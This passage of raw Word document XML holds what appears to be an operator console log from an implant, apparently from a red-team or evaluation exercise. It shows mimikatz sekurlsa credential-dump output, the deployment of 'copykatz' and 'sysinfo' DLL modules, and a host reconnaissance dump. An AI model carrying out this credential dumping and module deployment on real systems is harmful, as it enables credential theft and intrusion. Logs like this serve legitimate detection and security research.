    <w:p w14:paraId="1DC242F3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F1488" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:40:20 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C137E59" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E2E71D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C901A6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B512D66" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344771B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : TA1-FIVEDIRECTI$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E1E374" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDFA38B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D91F37F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73372D78" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : ta1-fivedirecti$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D848BC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B1CC0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723AE463" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5858A6B8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C00CB51" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2584C08A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>***** FINISHED MIMIKATZ SEKURLSA PASSWORDS MODULE *****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB2700" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22742609" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>TA1-FIVEDIRECTI$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE3E4A2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC711FD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4909E968" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4C1419" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : ta1-fivedirecti$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DABCA57" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327E3B7B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBCA94A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B739EC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5735FBDC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0BFAC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>***** FINISHED MIMIKATZ SEKURLSA PASSWORDS MODULE *****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA014DB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B4D05BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1872F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0C1562" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+-------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699CF517" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] |   name   | library                             | deployed |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45735ECD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+-------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608CA71" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] | copykatz | /e5/deploy/copykatz.windows.x64.dll |    1     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B4770" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+-------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45006D3A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6B263C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A68F4E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;module sysinfo /e5/deploy/sysinfo.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D4966E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BAD70" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+-------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2659735C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] |   name   | library                             | deployed |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AB69D0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+-------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B071EC9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] | sysinfo  | /e5/deploy/sysinfo.windows.x64.dll  |    0     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B34F723" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[*] | copykatz | /e5/deploy/copykatz.windows.x64.dll |    1     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9C5B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+-------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E21F82E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783AF7AA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C37D0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;deploy sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6635CE33" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Loading module /e5/deploy/sysinfo.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393457BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] deploy success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2816C601" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;[*] register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB6CDC3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C006A8F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1704DD0C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0DAD2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F76C61" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] register success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200580A9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E258872" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F047F8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;GetAllInfo virtuous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05C4AB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] sysinfo.GetAllInfo returned success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5156AA37" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04CCCE82" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401B127D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cat virtuous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A12744" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C3E15" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ BEGIN SYSTEM INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6196986C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Number of Keyboard(s) = 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69625D8B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Number of Mouse(s) = 2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAB966D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Number of HID(s) = 0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6DA3F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Kernel Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF661A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Kernel Type = 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5CA44C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Build Version = 10.0.16299.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0917E1F0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Kernel Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74435E12" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin OS Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577CC6FB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - OS Name = Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EA817E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Version Name = ERROR : WMI Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0776B7B6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Build Version = 10.0.16299.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70727B09" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End OS Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E6F1C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Memory Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D5E2D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Physical Memory (24.74 GB/28.00 GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B3415" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Virtual Memory (131070.29 GB/131072.00 GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B9E065" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Memory Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE26992" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin All Displays Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F8C894" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> - Number of Displays = 1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473394A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> - Display #1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9CD8A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Display Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAEF3EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Dimensions = 1024x768 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0F8A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - BitsPerPixel = 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF2C68" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - DotsPerInch = 96</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B74542" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Display Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E8C6A6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End All Displays Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2519A7B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ END SYSTEM INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644325E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F116794" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59BF8B1B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ BEGIN CPU INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24486BD8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
